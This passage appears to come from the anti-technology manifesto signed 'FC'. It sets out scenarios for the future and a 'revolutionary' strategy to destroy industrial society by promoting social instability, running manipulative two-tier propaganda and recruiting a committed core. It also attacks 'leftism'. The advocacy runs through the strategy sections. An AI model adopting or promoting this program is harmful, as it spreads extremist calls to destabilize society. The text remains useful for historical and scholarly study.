other environmental problems that cannot yet be foreseen.
And, as nuclear proliferation has shown, new technology
cannot be kept out of the hands of dictators and
irresponsible Third World nations. Would you like to
speculate about what Iraq or North Korea will do with
genetic engineering?

170. "Oh!" say the technophiles, "Science is going to fix
all that! We will conquer famine, eliminate psychological
suffering, make everybody healthy and happy!" Yeah, sure.
That's what they said 200 years ago. The Industrial
Revolution was supposed to eliminate poverty, make
everybody happy, etc. The actual result has been quite
different. The technophiles are hopelessly naive (or
self-deceiving) in their understanding of social
problems. They are unaware of (or choose to ignore) the
fact that when large changes, even seemingly beneficial
ones, are introduced into a society, they lead to a long
sequence of other changes, most of which are impossible
to predict (paragraph 103). The result is disruption of
the society. So it is very probable that in their
attempts to end poverty and disease, engineer docile,
happy personalities and so forth, the technophiles will
create social systems that are terribly troubled, even
more so than the present once. For example, the
scientists boast that they will end famine by creating
new, genetically engineered food plants. But this will
allow the human population to keep expanding
indefinitely, and it is well known that crowding leads to
increased stress and aggression. This is merely one
example of the PREDICTABLE problems that will arise. We
emphasize that, as past experience has shown, technical
progress will lead to other new problems that CANNOT be
predicted in advance (paragraph 103). In fact, ever since
the Industrial Revolution, technology has been creating
new problems for society far more rapidly than it has
been solving old ones. Thus it will take a long and
difficult period of trial and error for the technophiles
to work the bugs out of their Brave New World (if they
every do). In the meantime there will be great suffering.
So it is not at all clear that the survival of industrial
society would involve less suffering than the breakdown
of that society would. Technology has gotten the human
race into a fix from which there is not likely to be any
easy escape.


THE FUTURE

171. But suppose now that industrial society does survive
the next several decades and that the bugs do eventually
get worked out of the system, so that it functions
smoothly. What kind of system will it be? We will
consider several possibilities.

172. First let us postulate that the computer scientists
succeed in developing intelligent machines that can do
all things better than human beings can do them. In that
case presumably all work will be done by vast, highly
organized systems of machines and no human effort will be
necessary. Either of two cases might occur. The machines
might be permitted to make all of their own decisions
without human oversight, or else human control over the
machines might be retained.

173. If the machines are permitted to make all their own
decisions, we can't make any conjectures as to the
results, because it is impossible to guess how such
machines might behave. We only point out that the fate of
the human race would be at the mercy of the machines. It
might be argued that the human race would never be
foolish enough to hand over all power to the machines.
But we are suggesting neither that the human race would
voluntarily turn power over to the machines nor that the
machines would willfully seize power. What we do suggest
is that the human race might easily permit itself to
drift into a position of such dependence on the machines
that it would have no practical choice but to accept all
of the machines' decisions. As society and the problems
that face it become more and more complex and as machines
become more and more intelligent, people will let
machines make more and more of their decisions for them,
simply because machine-made decisions will bring better
results than man-made ones. Eventually a stage may be
reached at which the decisions necessary to keep the
system running will be so complex that human beings will
be incapable of making them intelligently. At that stage
the machines will be in effective control. People won't
be able to just turn the machine off, because they will
be so dependent on them that turning them off would
amount to suicide.

174. On the other hand it is possible that human control
over the machines may be retained. In that case the
average man may have control over certain private
machines of his own, such as his car or his personal
computer, but control over large systems of machines will
be in the hands of a tiny elite -- just as it is today,
but with two differences. Due to improved techniques the
elite will have greater control over the masses; and
because human work will no longer be necessary the masses
will be superfluous, a useless burden on the system. If
the elite is ruthless they may simply decide to
exterminate the mass of humanity. If they are humane they
may use propaganda or other psychological or biological
techniques to reduce the birth rate until the mass of
humanity becomes extinct, leaving the world to the elite.
Or, if the elite consists of soft-hearted liberals, they
may decide to play the role of good shepherds to the rest
of the human race. They will see to it that everyone's
physical needs are satisfied, that all children are
raised under psychologically hygienic conditions, that
everyone has a wholesome hobby to keep him busy, and that
anyone who may become dissatisfied undergoes "treatment"
to cure his "problem." Of course, life will be so
purposeless that people will have to be biologically or
psychologically engineered either to remove their need
for the power process or to make them "sublimate" their
drive for power into some harmless hobby. These
engineered human beings may be happy in such a society,
but they most certainly will not be free. They will have
been reduced to the status of domestic animals.

175. But suppose now that the computer scientists do not
succeed in developing artificial intelligence, so that
human work remains necessary. Even so, machines will take
care of more and more of the simpler tasks so that there
will be an increasing surplus of human workers at the
lower levels of ability. (We see this happening already.
There are many people who find it difficult or impossible
to get work, because for intellectual or psychological
reasons they cannot acquire the level of training
necessary to make themselves useful in the present
system.) On those who are employed, ever-increasing
demands will be placed: They will need more and more
training, more and more ability, and will have to be ever
more reliable, conforming and docile, because they will
be more and more like cells of a giant organism. Their
tasks will be increasingly specialized, so that their
work will be, in a sense, out of touch with the real
world, being concentrated on one tiny slice of reality.
The system will have to use any means that it can,
whether psychological or biological, to engineer people
to be docile, to have the abilities that the system
requires and to "sublimate" their drive for power into
some specialized task. But the statement that the people
of such a society will have to be docile may require
qualification. The society may find competitiveness
useful, provided that ways are found of directing
competitiveness into channels that serve the needs of the
system. We can imagine a future society in which there is
endless competition for positions of prestige and power.
But no more than a very few people will ever reach the
top, where the only real power is (see end of paragraph
163). Very repellent is a society in which a person can
satisfy his need for power only by pushing large numbers
of other people out of the way and depriving them of
THEIR opportunity for power.

176. One can envision scenarios that incorporate aspects
of more than one of the possibilities that we have just
discussed. For instance, it may be that machines will
take over most of the work that is of real, practical
importance, but that human beings will be kept busy by
being given relatively unimportant work. It has been
suggested, for example, that a great development of the
service industries might provide work for human beings.
Thus people would spent their time shining each other's
shoes, driving each other around in taxicabs, making
handicrafts for one another, waihng on each other's
tables, etc. This seems to us a thoroughly contemptible
way for the human race to end up, and we doubt that many
people would find fulfilling lives in such pointless
busy-work. They would seek other, dangerous outlets
(drugs, crime, "cults," hate groups) unless they were
biologically or psychologically engineered to adapt them
to such a way of lffe.

177. Needless to say, the scenarios outlined above do not
exhaust all the possibilities. They only indicate the
kinds of outcomes that seem to us most likely. But we can
envision no plausible scenarios that are any more
palatable than the ones we've just described. It is
overwhelmingly probable that if the
industrial-technological system survives the next 40 to
100 years, it will by that time have developed certain
general characteristics: Individuals (at least those of
the "bourgeois" type, who are integrated into the system
and make it run, and who therefore have all the power)
will be more dependent than ever on large organizations;
they will be more "socialized" than ever and their
physical and mental qualities to a significant extent
(possibly to a very great extent) will be those that are
engineered into them rather than being the results of
chance (or of God's will, or whatever); and whatever may
be left of wild nature will be reduced to remnants
preserved for scientific study and kept under the
supervision and management of scientists (hence it will
no longer be truly wild). In the long run (say a few
centuries from now) it is likely that neither the human
race nor any other important organisms will exist as we
know them today, because once you start modifying
organisms through genetic engineering there is no reason
to stop at any particular point, so that the
modifications will probably continue until man and other
organisms have been utterly transformed.

178. Whatever else may be the case, it is certain that
technology is creating for human beings a new physical
and social environment radically different from the
spectrum of environments to which natural selection has
adapted the human race physically and psychologically. If
man is not adjusted to this new environment by being
artificially re-engineered, then he will be adapted to it
through a long and painful process of natural selection.
The former is far more likely than the latter.

179. It would be better to dump the whole stinking system
and take the consequences.


STRATEGY

180. The technophiles are taking us all on an utterly
reckless ride into the unknown. Many people understand
something of what technological progress is doing to us
yet take a passive attitude toward it because they think
it is inevitable. But we (FC) don't think it is
inevitable. We think it can be stopped, and we will give
here some indications of how to go about stopping it.

181. As we stated in paragraph 166, the two main tasks
for the present are to promote social stress and
instability in industrial society and to develop and
propagate an ideology that opposes technology and the
industrial system. When the system becomes sufficiently
stressed and unstable, a revolution against technology
may be possible. The pattern would be similar to that of
the French and Russian Revolutions. French society and
Russian society, for several decades prior to their
respective revolutions, showed increasing signs of stress
and weakness. Meanwhile, ideologies were being developed
that offered a new world view that was quite different
from the old one. In the Russian case, revolutionaries
were actively working to undermine the old order. Then,
when the old system was put under sufficient additional
stress (by financial crisis in France, by military defeat
in Russia) it was swept away by revolution. What we
propose is something along the same lines.

182. It will be objected that the French and Russian
Revolutions were failures. But most revolutions have two
goals. One is to destroy an old form of society and the
other is to set up the new form of society envisioned by
the revolutionaries. The French and Russian
revolutionaries failed (fortunately!) to create the new
kind of society of which they dreamed, but they were
quite successful in destroying the old society. We have
no illusions about the feasibility of creating a new,
ideal form of society. Our goal is only to destroy the
existing form of society.

183. But an ideology, in order to gain enthusiastic
support, must have a positive ideal as well as a negative
one; it must be FOR something as well as AGAINST
something. The positive ideal that we propose is Nature.
That is, WILD nature: those aspects of the functioning of
the Earth and its living things that are independent of
human management and free of human interference and
control. And with wild nature we include human nature, by
which we mean those aspects of the functioning of the
human individual that are not subject to regulation by
organized society but are products of chance, or free
will, or God (depending on your religious or
philosophical opinions).

184. Nature makes a perfect counter-ideal to technology
for several reasons. Nature (that which is outside the
power of the system) is the opposite of technology (which
seeks to expand indefinitely the power of the system).
Most people will agree that nature is beautiful;
certainly it has tremendous popular appeal. The radical
environmentalists ALREADY hold an ideology that exalts
nature and opposes technology. [30] It is not necessary
for the sake of nature to set up some chimerical utopia
or any new kind of social order. Nature takes care of
itself: It was a spontaneous creation that existed long
before any human society, and for countless centuries
many different kinds of human societies coexisted with
nature without doing it an excessive amount of damage.
Only with the Industrial Revolution did the effect of
human society on nature become really devastating. To
relieve the pressure on nature it is not necessary to
create a special kind of social system, it is only
necessary to get rid of industrial society. Granted, this
will not solve all problems. Industrial society has
already done tremendous damage to nature and it will take
a very long time for the scars to heal. Besides, even
preindustrial societies can do significant damage to
nature. Nevertheless, getting rid of industrial society
will accomplish a great deal. It will relieve the worst
of the pressure on nature so that the scars can begin to
heal. It will remove the capacity of organized society to
keep increasing its control over nature (including human
nature). Whatever kind of society may exist after the
demise of the industrial system, it is certain that most
people will live close to nature, because in the absence
of advanced technology there is no other way that people
CAN live. To feed themselves they must be peasants or
herdsmen or fishermen or hunters, etc. And, generally
speaking, local autonomy should tend to increase, because
lack of advanced technology and rapid communications will
limit the capacity of governments or other large
organizations to control local communities.

185. As for the negative consequences of eliminating
industrial society -- well, you can't eat your cake and
have it too. To gain one thing you have to sacrifice
another.

186. Most people hate psychological conflict. For this
reason they avoid doing any serious thinking about
difficult social issues, and they like to have such
issues presented to them in simple, black-and-white
terms: THIS is all good and THAT is all bad. The
revolutionary ideology should therefore be developed on
two levels.

187. On the more sophisticated level the ideology should
address itself to people who are intelligent, thoughtful
and rational. The object should be to create a core of
people who will be opposed to the industrial system on a
rational, thought-out basis, with full appreciation of
the problems and ambiguities involved, and of the price
that has to be paid for getting rid of the system. It is
particularly important to attract people of this type, as
they are capable people and will be instrumental in
influencing others. These people should be addressed on
as rational a level as possible. Facts should never
intentionally be distorted and intemperate language
should be avoided. This does not mean that no appeal can
be made to the emotions, but in making such appeal care
should be taken to avoid misrepresenting the truth or
doing anything else that would destroy the intellectual
respectability of the ideology.

188. On a second level, the ideology should be propagated
in a simplified form that will enable the unthinking
majority to see the conflict of technology vs. nature in
unambiguous terms. But even on this second level the
ideology should not be expressed in language that is so
cheap, intemperate or irrational that it alienates people
of the thoughfful and rational type. Cheap, intemperate
propaganda sometimes achieves impressive short-term
gains, but it will be more advantageous in the long run
to keep the loyalty of a small number of intelligently
committed people than to arouse the passions of an
unthinking, fickle mob who will change their attitude as
soon as someone comes along with a better propaganda
gimmick. However, propaganda of the rabble-rousing type
may be necessary when the system is nearing the point of
collapse and there is a final struggle between rival
ideologies to determine which will become dominant when
the old world-view goes under.

189. Prior to that final struggle, the revolutionaries
should not expect to have a majority of people on their
side. History is made by active, determined minorities,
not by the majority, which seldom has a clear and
consistent idea of what it really wants. Until the time
comes for the final push toward revolution [31], the task
of revolutionaries will be less to win the shallow
support of the majority than to build a small core of
deeply committed people. As for the majority, it will be
enough to make them aware of the existence of the new
ideology and remind them of it frequently; though of
course it will be desirable to get majority support to
the extent that this can be done without weakening the
core of seriously committed people.

190. Any kind of social conflict helps to destabilize the
system, but one should be careful about what kind of
conflict one encourages. The line of conflict should be
drawn between the mass of the people and the
power-holding elite of industrial society (politicians,
scientists, upper-level business executives, government
officials, etc.). It should NOT be drawn between the
revolutionaries and the mass of the people. For example,
it would be bad strategy for the revolutionaries to
condemn Americans for their habits of consumption.
Instead, the average American should be portrayed as a
victim of the advertising and marketing industry, which
has suckered him into buying a lot of junk that he
doesn't need and that is very poor compensation for his
lost freedom. Either approach is consistent with the
facts. It is merely a matter of attitude whether you
blame the advertising industry for manipulating the
public or blame the public for allowing itself to be
manipulated. As a matter of strategy one should generally
avoid blaming the public. 

191. One should think twice before encouraging any other
social conflict than that between the power-holding elite
(which wields technology) and the general public (over
which technology exerts its power). For one thing, other
conflicts tend to distract attention from the important
conflicts (between power-elite and ordinary people,
between technology and nature); for another thing, other
conflicts may actually tend to encourage
technologization, because each side in such a conflict
wants to use technological power to gain advantages over
its adversary. This is clearly seen in rivalries between
nations. It also appears in ethnic conflicts within
nations. For example, in America many black leaders are
anxious to gain power for African Americans by placing
back individuals in the technological power-elite. They
want there to be many black government officials,
scientists, corporation executives and so forth. In this
way they are helping to absorb the African American
subculture into the technological system. Generally
speaking, one should encourage only those social
conflicts that can be fitted into the framework of the
conflicts of power-elite vs. ordinary people, technology
vs nature.

192. But the way to discourage ethnic conflict is NOT
through militant advocacy of minority rights (see
paragraphs 21, 29). Instead, the revolutionaries should
emphasize that although minorities do suffer more or less
disadvantage, this disadvantage is of peripheral
significance. Our real enemy is the industrial-
technological system, and in the struggle against the
system, ethnic distinctions are of no importance.

193. The kind of revolution we have in mind will not
necessarily involve an armed uprising against any
government. It may or may not involve physical violence,
but it will not be a POLITICAL revolution. Its focus will
be on technology and economics, not politics. [32]

194. Probably the revolutionaries should even AVOID
assuming political power, whether by legal or illegal
means, until the industrial system is stressed to the
danger point and has proved itself to be a failure in the
eyes of most people. Suppose for example that some
"green" party should win control of the United States
Congress in an election. In order to avoid betraying or
watering down their own ideology they would have to take
vigrous measures to turn economic growth into economic
shrinkage. To the average man the results would appear
disastrous: There would be massive unemployment,
shortages of commodities, etc Even if the grosser ill
effects could be avoided through superhumanly skillful
management, still people would have to begin giving up
the luxuries to which they have become addicted.
Dissatisfaction would grow, the "green" party would be
voted out o,f offfice and the revolutionaries would have
suffered a severe setback. For this reason the
revolutionaries should not try to acquire political power
until the system has gotten itself into such a mess that
any hardships will be seen as resulting from the failures
of the industrial system itself and not from the policies
of the revolutionaries. The revolution against technology
will probably have to be a revolution by outsiders, a
revolution from below and not from above.

195. The revolution must be international and worldwide.
It cannot be carried out on a nation-by-nation basis.
Whenever it is suggested that the United States, for
example, should cut back on technological progress or
economic growth, people get hysterical and start
screaming that if we fall behind in technology the
Japanese will get ahead of us. Holy robots! The world
will fly off its orbit if the Japanese ever sell more
cars than we do! (Nationalism is a great promoter of
technology.) More reasonably, it is argued that if the
relatively democratic nations of the world fall behind in
technology while nasty, dictatorial nations like China,
Vietnam and North Korea continue to progress, eventually
the dictators may come to dominate the world. That is why
the industrial system should be attacked in all nations
simultaneously, to the extent that this may be possible.
True, there is no assurance that the industrial system
can be destroyed at approximately the same time all over
the world, and it is even conceivable that the attempt to
overthrow the system could lead instead to the domination
of the system by dictators. That is a risk that has to be
taken. And it is worth taking, since the difference
between a "democratic" industrial system and one
controlled by dictators is small compared with the
difference between an industrial system and a
non-industrial one. [33] It might even be argued that an
industrial system controlled by dictators would be
preferable, because dictator-controlled systems usually
have proved ineffficient, hence they are presumably more
likely to break down. Look at Cuba.

196. Revolutionaries might consider favoring measures
that tend to bind the world economy into a unified whole.
Free trade agreements like NAFTA and GATT are probably
harmful to the environment in the short run, but in the
long run they may perhaps be advantageous because they
foster economic interdependence between nations. It will
be easier to destroy the industrial system on a worldwide
basis if the world economy is so unified that its
breakdown in any one major nation will lead to its
breakdown in all industrialized nations.

197. Some people take the line that modern man has too
much power, too much control over nature; they argue for
a more passive attitude on the part of the human race. At
best these people are expressing themselves unclearly,
because they fail to distinguish between power for LARGE
ORGANIZATIONS and power for INDIVIDUALS and SMALL GROUPS.
It is a mistake to argue for powerlessness and passivity,
because people NEED power. Modern man as a collective
entity -- that is, the industrial system -- has immense
power over nature, and we (FC) regard this as evil. But
modern INDIVIDUALS and SMALL GROUPS OF INDIVIDUALS have
far less power than primitive man ever did. Generally
speaking, the vast power of "modern man" over nature is
exercised not by individuals or small groups but by large
organizations. To the extent that the average modern
INDIVIDUAL can wield the power of technology, he is
permitted to do so only within narrow limits and only
under the supervision and control of the system. (You
need a license for everything and with the license come
rules and regulations.) The individual has only those
technological powers with which the system chooses to
provide him. His PERSONAL power over nature is slight.

198. Primitive INDIVIDUALS and SMALL GROUPS actually had
considerable power over nature; or maybe it would be
better to say power WITHIN nature. When primitive man
needed food he knew how to find and prepare edible roots,
how to track game and take it with homemade weapons. He
knew how to protect himself from heat cold, rain,
dangerous animals, etc. But primitive man did relatively
little damage to nature because the COLLECTIVE power of
primitive society was negligible compared to the
COLLECTIVE power of industrial society.

199. Instead of arguing for powerlessness and passivity,
one should argue that the power of the INDUSTRIAL SYSTEM
should be broken, and that this will greatly INCREASE the
power and freedom of INDIVIDUALS and SMALL GROUPS.

200. Until the industrial system has been thoroughly
wrecked, the destruction of that system must be the
revolutionaries' ONLY goal. Other goals would distract
attention and energy from the main goal. More importantly
if the revolutionaries permit themselves to have any
other goal than the destruction of technology, they will
be tempted to use technology as a tool for reaching that
other goal. If they give in to that temptation, they will
fall right back into the technological trap, because
modern technology is a unified, tightly organized system,
so that, in order to retain SOME technology, one finds
oneself obliged to retain MOST technology, hence one ends
up sacrificing only token amounts of technology.

201. Suppose for example that the revolutionaries took
"social justice" as a goal. Human nature being what it
is, social justice would not come about spontaneously; it
would have to be enforced. In order to enforce it the
revolutionaries would have to retain central organization
and control. For that they would need rapid long-distance
transportation and communication, and therefore all the
technology needed to support the transportation and
communication systems. To feed and clothe poor people
they would have to use agricultural and manufacturing
technology. And so forth. So that the attempt to insure
social justice would force them to retain most parts of
the technological system. Not that we have anything
against social justice, but it must not be allowed to
interfere with the effort to get rid of the technological
system.

202. It would be hopeless for revolutionaries to try to
attack the system without using SOME modern technology.
If nothing else they must use the communications media to
spread their message. But they should use modern
technology for only ONE purpose: to attack the
technological system.

203. Imagine an alcoholic sitting with a barrel of wine
in front of him. Suppose he starts saying to himself,
"Wine isn't bad for you if used in moderation. Why, they
say small amounts of wine are even good for you! It won't
do me any harm if I take just one little drink...." Well
you know what is going to happen. Never forget that the
human race with technology is just like an alcoholic with
a barrel of wine.

204. Revolutionaries should have as many children as they
can. There is strong scientific evidence that social
attitudes are to a significant extent inherited. No one
suggests that a social attitude is a direct outcome of a
person's genetic constitution, but it appears that
personality traits are partly inherited and that certain
personality traits tend, within the context of our
society, to make a person more likely to hold this or
that social attitude. Objections to these findings have
been raised, but the objections are feeble and seem to be
ideologically motivated. In any event, no one denies that
children tend on the average to hold social attitudes
similar to those of their parents. From our point of view
it doesn't matter all that much whether the attitudes are
passed on genetically or through childhood training. In
either case they ARE passed on.

205. The trouble is that many of the people who are
inclined to rebel against the industrial system are also
concerned about the population problems, hence they are
apt to have few or no children. In this way they may be
handing the world over to the sort of people who support
or at least accept the industrial system. To insure the
strength of the next generation of revolutionaries the
present generation should reproduce itself abundantly. In
doing so they will be worsening the population problem
only slightly. And the important problem is to get rid of
the industrial system, because once the industrial system
is gone the world's population necessarily will decrease
(see paragraph 167); whereas, if the industrial system
survives, it will continue developing new techniques of
food production that may enable the world's population to
keep increasing almost indefinitely.

206. With regard to revolutionary strategy, the only
points on which we absolutely insist are that the single
overriding goal must be the elimination of modern
technology, and that no other goal can be allowed to
compete with this one. For the rest, revolutionaries
should take an empirical approach. If experience
indicates that some of the recommendations made in the
foregoing paragraphs are not going to give good results,
then those recommendations should be discarded.


TWO KINDS OF TECHNOLOGY

207. An argument likely to be raised against our proposed
revolution is that it is bound to fail, because (it is
claimed) throughout history technology has always
progressed, never regressed, hence technological
regression is impossible. But this claim is false.

208. We distinguish between two kinds of technology,
which we will call smallscale technology and
organizationdependent technology. Small-scale technology
is technology that can be used by small-scale communities
without outside assistance. Organization-dependent
technology is technology that depends on large-scale
social organization. We are aware of no significant cases
of regression in small-scale technology. But
organization-dependent technology DOES regress when the
social organization on which it depends breaks down.
Example: When the Roman Empire fell apart the Romans'
small-scale technology survived because any clever
village craftsman could build, for instance, a water
wheel, any skilled smith could make steel by Roman
methods, and so forth. But the Romans' organization-
dependent technology DID regress. Their aqueducts fell
into disrepair and were never rebuilt. Their techniques
of road construction were lost. The Roman system of urban
sanitation was forgotten, so that not until rather recent
times did the sanitation of European cities equal that of
Ancient Rome.

209. The reason why technology has seemed always to
progress is that, until perhaps a century or two before
the Industrial Revolution, most technology was
small-scale technology. But most of the technology
developed since the Industrial Revolution is
organizationdependent technology. Take the refrigerator
for example. Without factorymade parts or the facilities
of a postindustrial machine shop it would be virtually
impossible for a handful of local craftsmen to build a
refrigerator. If by some miracle they did succeed in
building one it would be useless to them without a
reliable source of electric power. So they would have to
dam a stream and build a generator. Generators require
large amounts of copper wire. Imagine trying to make that
wire without modern machinery. And where would they get
a gas suitable for refrigeration? It would be much easier
to build an icehouse or preserve food by drying or
picking, as was done before the invention of the
refrigerator.

210. So it is clear that if the industrial system were
once thoroughly broken down, refrigeration technology
would quickly be lost. The same is true of other
organization-dependent technology. And once this
technology had been lost for a generation or so it would
take centuries to rebuild it, just as it took centuries
to build it the first time around. Surviving technical
books would be few and scattered. An industrial society,
if built from scratch without outside help, can only be
built in a series of stages: You need tools to make tools
to make tools to make tools ... . A long process of
economic development and progress in social organization
is required. And, even in the absence of an ideology
opposed to technology, there is no reason to believe that
anyone would be interested in rebuilding industrial
society. The enthusiasm for "progress" is a phenomenon
peculiar to the modern form of society, and it seems not
to have existed prior to the 17th century or thereabouts.

211. In the late Middle Ages there were four main
civilizations that were about equally "advanced": Europe,
the Islamic world, India, and the Far East (China, Japan,
Korea). Three of those civilizations remained more or
less stable, and only Europe became dynamic. No one knows
why Europe became dynamic at that time; historians have
their theories but these are only speculation. At any
rate, it is clear that rapid development toward a
technological form of society occurs only under special
conditions. So there is no reason to assume that a
long-lasting technological regression cannot be brought
about.

212. Would society EVENTUALLY develop again toward an
industrial-technological form? Maybe, but there is no use
in worrying about it, since we can't predict or control
events 500 or 1,000 years in the future. Those problems
must be dealt with by the people who will live at that
time.


THE DANGER OF LEFTISM

213. Because of their need for rebellion and for
membership in a movement, leftists or persons of similar
psychological type often are unattracted to a rebellious
or activist movement whose goals and membership are not
initially leftist. The resulting influx of leftish types
can easily turn a non-leftist movement into a leftist
one, so that leftist goals replace or distort the
original goals of the movement.

214. To avoid this, a movement that exalts nature and
opposes technology must take a resolutely anti-leftist
stance and must avoid all collaboration with leftists.
Leftism is in the long run inconsistent with wild nature,
with human freedom and with the elimination of modern
technology. Leftism is collectivist; it seeks to bind
together the entire world (both nature and the human
race) into a unified whole. But this implies management
of nature and of human life by organized society, and it
requires advanced technology. You can't have a united
world without rapid transportation and communication, you
can't make all people love one another without
sophisticated psychological techniques, you can't have a
"planned society" without the necessary technological
base. Above all, leftism is driven by the need for power,
and the leftist seeks power on a collective basis,
through identification with a mass movement or an
organization. Leftism is unlikely ever to give up
technology, because technology is too valuable a source
of collective power.

215. The anarchist [34] too seeks power, but he seeks it
on an individual or small-group basis; he wants
individuals and small groups to be able to control the
circumstances of their own lives. He opposes technology
because it makes small groups dependent on large
organizations.

216. Some leftists may seem to oppose technology, but
they will oppose it only so long as they are outsiders
and the technological system is controlled by
non-leftists. If leftism ever becomes dominant in
society, so that the technological system becomes a tool
in the hands of leftists, they will enthusiastically use
it and promote its growth. In doing this they will be
repeating a pattern that leftism has shown again and
again in the past. When the Bolsheviks in Russia were
outsiders, they vigorously opposed censorship and the
secret police, they advocated self-determination for
ethnic minorities, and so forth; but as soon as they came
into power themselves, they imposed a tighter censorship
and created a more ruthless secret police than any that
had existed under the tsars, and they oppressed ethnic
minorities at least as much as the tsars had done. In the
United States, a couple of decades ago when leftists were
a minority in our universities, leftist professors were
vigorous proponents of academic freedom, but today, in
those of our universities where leftists have become
dominant, they have shown themselves ready to take away
from everyone else's academic freedom. (This is
"political correctness.") The same will happen with
leftists and technology: They will use it to oppress
everyone else if they ever get it under their own
control.

217. In earlier revolutions, leftists of the most
power-hungry type, repeatedly, have first cooperated with
non-leftist revolutionaries, as well as with leftists of
a more libertarian inclination, and later have
double-crossed them to seize power for themselves.
Robespierre did this in the French Revolution, the
Bolsheviks did it in the Russian Revolution, the
communists did it in Spain in 1938 and Castro and his
followers did it in Cuba. Given the past history of
leftism, it would be utterly foolish for non-leftist
revolutionaries today to collaborate with leftists.

218. Various thinkers have pointed out that leftism is a
kind of religion. Leftism is not a religion in the strict
sense because leftist doctrine does not postulate the
existence of any supernatural being. But, for the
leftist, leftism plays a psychological role much like
that which religion plays for some people. The leftist
NEEDS to believe in leftism; it plays a vital role in his
psychological economy. His beliefs are not easily
modified by logic or facts. He has a deep conviction that
leftism is morally Right with a capital R, and that he
has not only a right but a duty to impose leftist
morality on everyone. (However, many of the people we are
referring to as "leftists" do not think of themselves as
leftists and would not describe their system of beliefs
as leftism. We use the term "leftism" because we don't
know of any better words to designate the spectrum of
related creeds that includes the feminist, gay rights,
political correctness, etc., movements, and because these
movements have a strong affinity with the old left. See
paragraphs 227-230.)

219. Leftism is a totalitarian force. Wherever leftism is
in a position of power it tends to invade every private
corner and force every thought into a leftist mold. In
part this is because of the quasi-religious character of
leftism; everything contrary to leftist beliefs
represents Sin. More importantly, leftism is a
totalitarian force because of the leftists' drive for
power. The leftist seeks to satisfy his need for power
through identification with a social movement and he
tries to go through the power process by helping to
pursue and attain the goals of the movement (see
paragraph 83). But no matter how far the movement has
gone in attaining its goals the leftist is never
satisfied, because his activism is a surrogate activity
(see paragraph 41). That is, the leftist's real motive is
not to attain the ostensible goals of leftism; in reality
he is motivated by the sense of power he gets from
struggling for and then reaching a social goal. [35]
Consequently the leftist is never satisfied with the
goals he has already attained; his need for the power
process leads him always to pursue some new goal. The
leftist wants equal opportunities for minorities. When
that is attained he insists on statistical equality of
achievement by minorities. And as long as anyone harbors
in some corner of his mind a negative attitude toward
some minority, the leftist has to re-educated him. And
ethnic minorities are not enough; no one can be allowed
to have a negative attitude toward homosexuals, disabled
people, fat people, old people, ugly people, and on and
on and on. It's not enough that the public should be
informed about the hazards of smoking; a warning has to
be stamped on every package of cigarettes. Then cigarette
advertising has to be restricted ff not banned. The
activists will never be satisfied until tobacco is
outlawed, and after that it will be alcohol, then junk
food, etc. Activists have fought gross child abuse, which
is reasonable. But now they want to stop all spanking.
When they have done that they will want to ban something
else they consider unwholesome, then another thing and
then another. They will never be satisfied until they
have complete control over all child rearing practices.
And then they will move on to another cause.

220. Suppose you asked leftists to make a list of ALL the
things that were wrong with society, and then suppose you
instituted EVERY social change that they demanded. It is
safe to say that within a couple of years the majority of
leftists would find something new to complain about, some
new social "evil" to correct because, once again, the
leftist is motivated less by distress at society's ills
than by the need to satisfy his drive for power by
imposing his solutions on society.

221. Because of the restrictions placed on their thoughts
and behavior by their high level of socialization, many
leftists of the over-socialized type cannot pursue power
in the ways that other people do. For them the drive for
power has only one morally acceptable outlet, and that is
in the struggle to impose their morality on everyone.

222. Leftists, especially those of the oversocialized
type, are True Believers in the sense of Eric Hoffer's
book, "The True Believer." But not all True Believers are
of the same psychological type as leftists. Presumably a
true-believing nazi, for instance, is very different
psychologically from a true-believing leftist. Because of
their capacity for single-minded devotion to a cause,
True Believers are a useful, perhaps a necessary,
ingredient of any revolutionary movement. This presents
a problem with which we must admit we don't know how to
deal. We aren't sure how to harness the energies of the
True Believer to a revolution against technology. At
present all we can say is that no True Believer will make
a safe recruit to the revolution unless his commitment is
exclusively to the destruction of technology. If he is
committed also to another ideal, he may want to use
technology as a tool for pursuing that other ideal (see
paragraphs 220, 221).

223. Some readers may say, "This stuff about leftism is
a lot of crap. I know John and Jane who are leftish types
and they don't have all these totalitarian tendencies."
It's quite true that many leftists, possibly even a
numerical majority, are decent people who sincerely
believe in tolerating others' values (up to a point) and
wouldn't want to use high-handed methods to reach their
social goals. Our remarks about leftism are not meant to
apply to every individual leftist but to describe the
general character of leftism as a movement. And the
general character of a movement is not necessarily
determined by the numerical proportions of the various
kinds of people involved in the movement.

224. The people who rise to positions of power in leftist
movements tend to be leftists of the most power-hungry
type, because power-hungry people are those who strive
hardest to get into positions of power. Once the
power-hungry types have captured control of the movement,
there are many leftists of a gentler breed who inwardly
disapprove of many of the actions of the leaders, but
cannot bring themselves to oppose them. They NEED their
faith in the movement, and because they cannot give up
this faith they go along with the leaders. True, SOME
leftists do have the guts to oppose the totalitarian
tendencies that emerge, but they generally lose, because
the power-hungry types are better organized, are more
ruthless and Machiavellian and have taken care to build
themselves a strong power base.

225. These phenomena appeared clearly in Russia and other
countries that were taken over by leftists. Similarly,
before the breakdown of communism in the, USSR, leftish
types in the West would, seldom criticize that country.
If prodded they would admit that the USSR did many wrong
things, but then they would try to find excuses for the
communists and begin talking about the faults of the
West. They always opposed Western military resistance to
communist aggression. Leftish types all over the world
vigorously protested the U.S. military action in Vietnam,
but when the USSR invaded Afghanistan they did nothing.
Not that they approved of the Soviet actions; but because
of their leftist faith, they just couldn't bear to put
themselves in opposition to communism. Today, in those of
our universities where "political correctness" has become
dominant, there are probably many leftish types who
privately disapprove of the suppression of academic
freedom, but they go along with it anyway.

226. Thus the fact that many individual leftists are
personally mild and fairly tolerant people by no means
prevents leftism as a whole form having a totalitarian
tendency.

227. Our discussion of leftism has a serious weakness. It
is still far from clear what we mean by the word
"leftist." There doesn't seem to be much we can do about
this. Today leftism is fragmented into a whole spectrum
of activist movements. Yet not all activist movements are
leftist, and some activist movements (e.g., radical
environmentalism) seem to include both personalities of
the leftist type and personalities of thoroughly
un-leftist types who ought to know better than to
collaborate with leftists. Varieties of leftists fade out
gradually into varieties of non-leftists and we ourselves
would often be hard-pressed to decide whether a given
individual is or is not a leftist. To the extent that it
is defined at all, our conception of leftism is defined
by the discussion of it that we have given in this
article, and we can only advise the reader to use his own
judgment in deciding who is a leftist.

228. But it will be helpful to list some criteria for
diagnosing leftism. These criteria cannot be applied in
a cut and dried manner. Some individuals may meet some of
the criteria without being leftists, some leftists may
not meet any of the criteria. Again, you just have to use
your judgment.

229. The leftist is oriented toward large-scale
collectivism. He emphasizes the duty of the individual to
